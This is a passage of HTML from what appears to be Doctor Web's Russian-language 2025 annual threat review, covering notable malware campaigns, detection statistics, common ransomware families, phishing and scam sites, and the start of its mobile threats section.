&lt;p&gt;В январе 2025 года специалисты «Доктор Веб» &lt;a href="https://news.drweb.ru/show/?i=14976&amp;lng=ru" target="_blank"&gt;выявили&lt;/a&gt; кампанию по добыче криптовалюты Monero с использованием вредоносного майнера SilentCryptoMiner. Его файлы были замаскированы под различное ПО, например программы для совершения видеозвонков. При заражении компьютеров они удаляли другие майнеры, которые могли быть ранее установлены в систему. В рамках этой кампании для распространения некоторых вредоносных компонентов злоумышленники применяли стеганографию — прием, позволяющий скрыть одни данные среди других (например, в изображениях). После скачивания специальным образом сформированных изображений соответствующие компоненты SilentCryptoMiner извлекались из них и запускались.&lt;/p&gt;

&lt;p&gt;В апреле наши вирусные аналитики &lt;a href="https://news.drweb.ru/show/?i=15002&amp;lng=ru" target="_blank"&gt;проинформировали&lt;/a&gt; о трояне &lt;a href="https://vms.drweb.ru/search/?q=Android.Clipper.31&amp;lng=ru"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt;, обнаруженном в прошивке ряда бюджетных моделей Android-смартфонов. Злоумышленники встроили его в модифицированную версию мессенджера WhatsApp, который затем предустановили на устройства, скомпрометировав цепочку поставок некоторых производителей. &lt;a href="https://vms.drweb.ru/search/?q=Android.Clipper.31&amp;lng=ru"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; перехватывает отправляемые и принимаемые в мессенджере сообщения, ищет в них адреса криптокошельков Tron и Ethereum и заменяет их адресами, которые принадлежат киберпреступникам. При этом троян скрывает подмену, и жертвы видят в таких сообщениях корректные адреса криптокошельков.&lt;/p&gt;

&lt;p&gt;В этом же месяце эксперты «Доктор Веб» обнаружили Android-трояна &lt;a href="https://vms.drweb.ru/search/?q=Android.Spy.1292.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt;, которого злоумышленники внедрили в одну из версий картографической программы Alpine Quest и использовали для слежки за российскими военнослужащими. Вредоносное приложение собирало конфиденциальную информацию и позволяло атакующим красть файлы с зараженных устройств.&lt;/p&gt;

&lt;p&gt;В июле на сайте компании «Доктор Веб» вышел &lt;a href="https://news.drweb.ru/show/?i=15036&amp;lng=ru" target="_blank"&gt;материал&lt;/a&gt; о троянских программах &lt;a href="https://vms.drweb.ru/search/?q=Trojan.Scavenger&amp;lng=ru"&gt;&lt;b&gt;Trojan.Scavenger&lt;/b&gt;&lt;/a&gt;, предназначенных для кражи криптовалюты и паролей. Злоумышленники распространяли их под видом модов, читов и патчей для игр. Эти вредоносные приложения запускались с использованием легитимного ПО, в том числе через эксплуатацию в нем уязвимостей класса DLL Search Order Hijacking.&lt;/p&gt;

&lt;p&gt;В августе наши специалисты &lt;a href="https://news.drweb.ru/show/?i=15047&amp;lng=ru" target="_blank"&gt;уведомили&lt;/a&gt; о распространении многофункционального бэкдора &lt;a href="https://vms.drweb.ru/search/?q=Android.Backdoor.916.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt;, который был нацелен на представителей российских компаний. Вредоносное приложение под видом антивируса распространялось через личные сообщения в мессенджерах. Попадая на целевые устройства, &lt;a href="https://vms.drweb.ru/search/?q=Android.Backdoor.916.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; собирал конфиденциальные данные и позволял атакующим следить за жертвами.&lt;/p&gt;

&lt;p&gt;Кроме того, в августе антивирусная лаборатория «Доктор Веб» &lt;a href="https://news.drweb.ru/show/?i=15046" target="_blank"&gt;выпустила исследование&lt;/a&gt; таргетированной атаки группировки Scaly Wolf на российское машиностроительное предприятие. Киберпреступники задействовали целый набор вредоносных инструментов, среди которых одним из основных стал модульный бэкдор Updatar. Он позволял атакующим собирать конфиденциальные данные с зараженных компьютеров.&lt;/p&gt;

&lt;p&gt;В октябре эксперты «Доктор Веб» &lt;a href="https://news.drweb.ru/show/?i=15076&amp;lng=ru" target="_blank"&gt;рассказали&lt;/a&gt; о бэкдоре &lt;a href="https://vms.drweb.ru/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, встроенном в модифицированные злоумышленниками версии мессенджера Telegram X. &lt;a href="https://vms.drweb.ru/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=ru"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; крадет логины и пароли от учетных записей Telegram, а также похищает ряд других конфиденциальных данных. Вредоносная программа позволяет злоумышленникам получить полный контроль над учетной записью пользователя и управлять мессенджером, выполняя в нем действия от имени жертвы. Например, атакующие могут незаметно вступать в Telegram-каналы и покидать их, а также скрывать новые авторизованные устройства в интерфейсе троянской модификации Telegram X.&lt;/p&gt;

&lt;p&gt;В ноябре мы опубликовали &lt;a href="https://news.drweb.ru/show/?i=15078&amp;lng=ru" target="_blank"&gt;исследование&lt;/a&gt; таргетированной атаки хакерской группировки Cavalry Werewolf на российское государственное учреждение. При анализе инцидента эксперты «Доктор Веб» обнаружили множество вредоносных инструментов киберпреступников, включая инструменты с открытым исходным кодом. Вирусные аналитики изучили особенности группировки и выяснили, что ее участники предпочитают использовать бэкдоры с функциональностью обратного шелла и часто применяют Telegram API для управления зараженными компьютерами. Кроме того, они начинают атаки с отправки фишинговых писем якобы от имени государственных структур и прикрепляют к таким сообщениям вредоносное ПО, замаскированное под различные официальные документы.&lt;/p&gt;

&lt;p&gt;В декабре компания «Доктор Веб» опубликовала &lt;a href="https://news.drweb.ru/show/?i=15090&amp;lng=ru" target="_blank"&gt;анализ&lt;/a&gt; вредоносного приложения &lt;a href="https://vms.drweb.ru/search/?q=Trojan.ChimeraWire&amp;lng=ru"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;, который искусственно увеличивает популярность сайтов, притворяясь для этого человеком. Троянское приложение ищет нужные сайты в поисковых системах Google и Bing, открывает их и выполняет клики на загруженных веб-страницах в соответствии с полученными от злоумышленников заданиями. &lt;a href="https://vms.drweb.ru/search/?q=Trojan.ChimeraWire&amp;lng=ru"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; устанавливается на компьютеры при помощи ряда вредоносных программ, которые эксплуатируют уязвимости класса DLL Search Order Hijacking.&lt;/p&gt;

&lt;p&gt;В течение 2025 года наблюдался рост популярности атак с использованием метода ClickFix. Он заключается в том, что злоумышленники применяют социальную инженерию, обманом подталкивая потенциальных жертв к самостоятельному запуску вредоносного кода. Когда пользователи попадают на вредоносный или скомпрометированный сайт, тот сообщает им о якобы возникшей ошибке или о необходимости обновить браузер и предлагает «исправить» проблему. Для этого, в зависимости от варианта атаки, пользователей просят либо скопировать указанные на странице строки, либо просто нажать на соответствующую кнопку (например, «Обновить» или «Исправить»). В последнем случае нужное содержимое будет автоматически скопировано в буфер обмена. Затем их просят запустить командную строку или терминал PowerShell, вставить туда содержимое буфера обмена и нажать клавишу Enter. В результате жертвы самостоятельно исполняют вредоносный код, который запускает цепочку заражения компьютера. Подробнее об атаках ClickFix можно узнать в соответствующем &lt;a href="https://news.drweb.ru/show/?i=15074&amp;lng=ru" target="_blank"&gt;материале&lt;/a&gt; на нашем сайте.&lt;/p&gt;

&lt;h3&gt;Вирусная обстановка&lt;/h3&gt;

&lt;p&gt;По данным статистики детектирований антивируса Dr.Web, в 2025 году общее число обнаруженных угроз возросло на 5,45% по сравнению с 2024 годом. Число уникальных угроз снизилось на 15,89%. Чаще всего пользователи сталкивались с различными вредоносными скриптами и рекламными троянами. Кроме того, распространение получили трояны, которые используются для запуска других вредоносных программ. Также пользователям вновь угрожали троянские приложения, которые созданы на скриптовом языке AutoIt и распространяются в составе другого вредоносного ПО для затруднения его обнаружения.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/01_stat_2025_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/01_stat_2025_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.6&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.7&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Вредоносный скрипт, который в бесконечном цикле ищет окна с текстом &lt;span class="string"&gt;mode extensions&lt;/span&gt;, &lt;span class="string"&gt;разработчика&lt;/span&gt; и &lt;span class="string"&gt;розробника&lt;/span&gt; и шлет им событие нажатия кнопки Escape, принудительно закрывая их.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.BPlug.4242&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование вредоносного компонента браузерного расширения WinSafe. Этот компонент представляет собой сценарий JavaScript, который демонстрирует навязчивую рекламу в браузерах.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Starter.8319&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Starter.8326&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Starter.8332&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование вредоносных XML-скриптов, которые запускают трояна &lt;a href="https://vms.drweb.ru/search/?q=Trojan.AutoIt.289&amp;lng=ru"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; и его компоненты.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=JS.Siggen5.44590&amp;lng=ru"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
    &lt;dd&gt;Вредоносный код, добавленный в публичную JavaScript-библиотеку es5-ext-main. Демонстрирует определенное сообщение, если пакет установлен на сервер с часовым поясом российских городов.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen30.53926&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Хост-процесс модифицированного злоумышленниками фреймворка Electron, мимикрирующий под компонент приложения Steam (Steam Client WebHelper) и загружающий JavaScript-бэкдор.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.MalVpn.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Вредоносный скрипт, который различные вредоносные программы используют для соединения с управляющими серверами.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen31.34463&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Троян, написанный на языке программирования Go и предназначенный для загрузки в целевую систему различных майнеров и рекламного ПО. Вредоносная программа является DLL-файлом и располагается в &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;. Для своего запуска эксплуатирует уязвимость класса DLL Search Order Hijacking в торрент-клиенте uTorrent.&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;В почтовом трафике в 2025 году чаще всего встречались троянские программы, которые скачивали и устанавливали другое вредоносное ПО. Злоумышленники также распространяли через электронные письма различные бэкдоры, эксплойты, фишинговые документы и вредоносные скрипты.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/02_email_traffic_2025_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/02_email_traffic_2025_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;W97M.DownLoader.2938&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Семейство троянов-загрузчиков, использующих уязвимости документов Microsoft Office. Они предназначены для загрузки других вредоносных программ на атакуемый компьютер.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2017-11882.123&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2018-0798.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Эксплойты для использования уязвимостей в ПО Microsoft Office, позволяющие выполнить произвольный код.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.Phishing.684&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;JS.Phishing.745&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Вредоносный сценарий на языке JavaScript, формирующий фишинговую веб-страницу.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;BackDoor.AgentTeslaNET.20&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Вредоносная программа-шпион, предназначенная для кражи конфиденциальной информации. Например, она собирает и передает злоумышленникам логины и пароли из множества приложений, таких как браузеры, мессенджеры, почтовые клиенты, базы данных и т. д. Она также крадет данные из буфера обмена, реализует функциональность кейлоггера и может создавать снимки экрана (скриншоты).&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Win32.Expiro.153&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Файловый вирус, заражающий исполняемые файлы Windows. Его основное предназначение заключается в хищении паролей от различных программ.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.DownLoader.1225&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Эвристическое детектирование для ZIP-архивов, содержащих скрипты JavaScript с подозрительными именами.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.PackedNET.3223&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование вредоносных программ, защищенных упаковщиком.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1413&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование упакованной версии троянской программы &lt;a href="https://vms.drweb.ru/search/?q=Trojan.AutoIt.289&amp;lng=ru"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt;, написанной на скриптовом языке AutoIt. Она распространяется в составе группы из нескольких вредоносных приложений: майнера, бэкдора и модуля для самостоятельного распространения. &lt;a href="https://vms.drweb.ru/search/?q=Trojan.AutoIt.289&amp;lng=ru"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; выполняет различные вредоносные действия, затрудняющие обнаружение основной полезной нагрузки.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Шифровальщики&lt;/h3&gt;

&lt;p&gt;По сравнению с 2024, в 2025 году в Службу технической поддержки «Доктор Веб» поступило на 35,98% меньше запросов от пользователей, которые пострадали от троянских программ-шифровальщиков. Динамика регистрации запросов на расшифровку файлов представлена на диаграмме ниже.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/03_encoder_requests_2025_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/03_encoder_requests_2025_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Наиболее распространенные шифровальщики в 2025 году&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; &lt;span class="font-normal"&gt;(23,22% обращений пользователей)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Шифровальщик, также известный как Mimic. При поиске целевых файлов для шифрования троян использует библиотеку &lt;span class="string"&gt;everything.dll&lt;/span&gt; легитимной программы Everything, предназначенной для мгновенного поиска файлов на Windows-компьютерах.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt; &lt;span class="font-normal"&gt;(3,33% обращений пользователей)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Шифровальщик, основанный на исходном коде трояна-энкодера Conti. Шифрует файлы при помощи алгоритма ChaCha20. После ликвидации ряда управляющих серверов злоумышленников и раскрытия приватных RSA-ключей шифрования для некоторых модификаций этой вредоносной программы доступна расшифровка затронутых файлов.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35067&lt;/b&gt; &lt;span class="font-normal"&gt;(2,50% обращений пользователей)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Шифровальщик, известный как Macop (один из вариантов этого трояна — &lt;b&gt;Trojan.Encoder.30572&lt;/b&gt;). Обладает небольшим размером, порядка 30-40 Кбайт. Отчасти это обусловлено тем, что троян не несет с собой сторонних криптографических библиотек, а для шифрования и генерации ключей пользуется исключительно CryptoAPI-функциями. Для шифрования файлов применяет алгоритм AES-256, а сами ключи шифруются RSA-1024.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; &lt;span class="font-normal"&gt;(2,31% обращений пользователей)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Шифровальщик, артефакты в котором указывают на причастность к его созданию хакерской группировки C77L.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt; &lt;span class="font-normal"&gt;(2,13% обращений пользователей)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Троян-вымогатель, имеющий несколько версий. Его актуальные модификации шифруют файлы алгоритмом AES-256+RSA.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Сетевое мошенничество&lt;/h3&gt;

&lt;p&gt;В 2025 году интернет-аналитики компании «Доктор Веб» наблюдали рост числа фишинговых сайтов, созданных для кражи учетных записей мессенджера Telegram. Злоумышленники использовали различные схемы: поддельные страницы аутентификации и авторизации, поддельные сообщения от службы поддержки Telegram, предупреждавшие о якобы выявленных нарушениях при использовании мессенджера и необходимости выполнить «проверку» учетной записи, и т. д.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/04_scam_01_telegram_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/04_scam_01_telegram_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Пример фишингового сайта, сообщающего о необходимости выполнить проверку учетной записи Telegram в связи с неким нарушением условий использования сервиса&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Подобные сайты создавались и для пользователей других сервисов, например игровых платформ, интернет-магазинов и т. д. Подделки могли выглядеть как настоящие интернет-ресурсы и предлагали войти в учетную запись. Если пользователи попадались на уловку, конфиденциальная информация оказывалась у злоумышленников.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/05_fake_steam_login_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/05_fake_steam_login_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Поддельный сайт сервиса Steam демонстрирует фишинговую форму для ввода логина и пароля&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Пользователи снова сталкивались с различными вариантами мошеннических интернет-ресурсов, которые предлагали всевозможные подарки и бонусы, участие в неких «выгодных акциях». Распространение получили поддельные сайты российских маркетплейсов, где посетители якобы могли принять участие в розыгрыше призов. «Выигрыш» на них был запрограммирован, а для его «получения» от жертвы требовалась определенная оплата, например якобы в виде налога, затем — за доставку товара и его страховку. В других вариантах мошеннической схемы нужный товар якобы отсутствовал, но вместо него предлагался денежный эквивалент. Для «получения» денег пользователь также должен был совершить ряд платежей: в виде пошлины, страховки и т. п. Никакого приза жертва в итоге не получала.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/06_fake_market_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/06_fake_market_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Пример поддельного сайта маркетплейса, предлагающего принять участие в «розыгрыше призов»&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Вариантами подобных схем были ориентированные на жителей Великобритании поддельные сайты транспортных компаний. Они предлагали принять участие в розыгрыше транспортных карт, якобы приуроченных к определенному событию и позволяющих бесплатно пользоваться услугами общественного транспорта. После «выигрыша» мошенники просили жертв предоставить персональные данные и оплатить небольшую «комиссию».&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/07_scam_transportcard_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/07_scam_transportcard_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Мошеннический сайт якобы от имени транспортной компании предлагает принять участие в «розыгрыше карты»&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Актуальными остались всевозможные мошеннические сайты финансовой тематики. Популярными среди злоумышленников снова были ресурсы, предлагавшие зарабатывать торговлей на рынке с использованием автоматизированных систем на базе неких уникальных алгоритмов и технологий искусственного интеллекта. Подобные сайты создаются с ориентиром на жителей многих стран. Чаще всего на них запрашиваются персональные данные для регистрации «заявки» или «учетной записи», после чего информация попадает в руки злоумышленников, которые используют ее по своему усмотрению. В дальнейшем они могут перепродать данные или же продолжат заманивать потенциальную жертву в поддельный инвестиционный сервис, требуя внести деньги на «торговый» счет.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/08_scam_appleAI_trade_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/08_scam_appleAI_trade_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Один из мошеннических сайтов, предлагавших доступ к «инвестиционной платформе» на базе технологий искусственного интеллекта, якобы имел отношение к корпорации Apple&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Многие такие сайты построены на базе похожих шаблонов в виде поддельного чата с «виртуальным помощником» или «сотрудником» той или иной компании, якобы от имени которой мошенники обращаются к потенциальной жертве. Пользователем предлагается ответить на ряд вопросов, после чего указать персональные данные.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/09_scam_france_ai_trade_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/09_scam_france_ai_trade_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;На одном из сайтов злоумышленники предлагали пользователям из Франции получить доступ к несуществующему автоматизированному торговому ПО TraderAI, который якобы позволит зарабатывать от 3 500€&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Один из ресурсов рекламировал инвестиционный сервис, якобы построенный непосредственно на базе мессенджера Telegram. Сайт обещал доход 10 000€ в месяц от автоматической торговли акциями мировых компаний «прямо в телефонном браузере».&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/10_scam_telegram_platform_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/10_scam_telegram_platform_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Сайт мошенников приглашает присоединиться к «платформе Telegram», которая якобы самостоятельно торгует акциями&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Злоумышленники также предлагали потенциальным жертвам заработать при помощи «торговых ботов», якобы созданных при участии крупных компаний и сервисов, таких как  Telegram, WhatsApp, TikTok и других.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/11_scam_whatsap_bot_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/11_scam_whatsap_bot_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Пример сайта, который приглашал воспользоваться несуществующим торговым ботом, якобы имеющим отношение к мессенджеру WhatsApp&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;В течение 2025 года наши интернет-аналитики выявляли новые мошеннические сайты предлагавшие инвестировать в нефтегазовый сектор пользователям многих стран, включая Россию, страны СНГ и Европы. На таких сайтах у потенциальных жертв в большинстве случаев также запрашивается персональная информация: имя, фамилия, номер мобильного телефона, адрес электронной почты и т. д.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/12_scam_kyrgyzgaz_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/12_scam_kyrgyzgaz_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Мошеннический сайт, ориентированный на граждан Киргизии, предлагает им «зарабатывать на нефти и газе», обещая крупный доход&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Вновь появлялись мошеннические сайты, предлагавшие получить «государственную помощь» в виде выплат или компенсаций. Например, в российском сегменте интернета были распространены мошеннические ресурсы, якобы имеющие отношение к порталу «Госуслуги».&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/13_scam_fakegosuslugi_viplati_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/13_scam_fakegosuslugi_viplati_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Пример мошеннического сайта, который якобы был связан с сервисом «Госуслуги» и обещал российским пользователям стабильные выплаты от государства и крупной нефтегазовой компании. Для «участия» в программе выплат у жертвы запрашивались персональные данные&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Наши специалисты также отметили появление очередных поддельных сайтов образовательных проектов. Они предлагали пользователям пройти различные обучающие курсы, чтобы повысить свою финансовую грамотность, освоить ту или иную профессию т. д. Для «доступа» к обучению у потенциальных жертв, как и во многих других подобных схемах, также запрашивалась персональная информация.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/14_scam_study_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/14_scam_study_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Один из мошеннических сайтов предлагал освоить английский язык&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Интернет-аналитики «Доктор Веб» выявляли новые мошеннические сайты по продаже театральных билетов. На таких ресурсах злоумышленники предлагают потенциальным жертвам приобрести билеты по выгодным ценам, однако после «оплаты» пользователи их не получают.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/15_fake_bilet_theater_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/15_fake_bilet_theater_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Пример мошеннического сайта, продававшего несуществующие театральные билеты&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Кроме того, распространение получили и новые поддельные сайты частных кинотеатров. Как и в случае с билетами в театр, мошенники предлагают потенциальным жертвам купить билеты в кино, но те в итоге лишь отдают свои деньги злоумышленникам.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/16_fake_cinema_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/16_fake_cinema_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Поддельный сайт одного из частных кинотеатров&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;Для мобильных устройств&lt;/h3&gt;

&lt;p&gt;Согласно статистике детектирований Dr.Web Security Space для мобильных устройств, в 2025 году пользователи Android чаще всего сталкивались с рекламными троянами &lt;a href="https://vms.drweb.ru/search/?q=Android.MobiDash&amp;lng=ru"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; и &lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, а также программами-подделками &lt;a href="https://vms.drweb.ru/search/?q=Android.FakeApp&amp;lng=ru"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, которые вместо заявленной функциональности могут загружать различные веб-сайты, в том числе мошеннические и вредоносные. Отмечался рост активности троянских приложений &lt;a href="https://vms.drweb.ru/search/?q=Android.Triada&amp;lng=ru"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;. Они представляют собой многофункциональные угрозы, которые злоумышленники встраивают в прошивку Android-устройств. Кроме того, наблюдался рост числа атак банковских троянов &lt;a 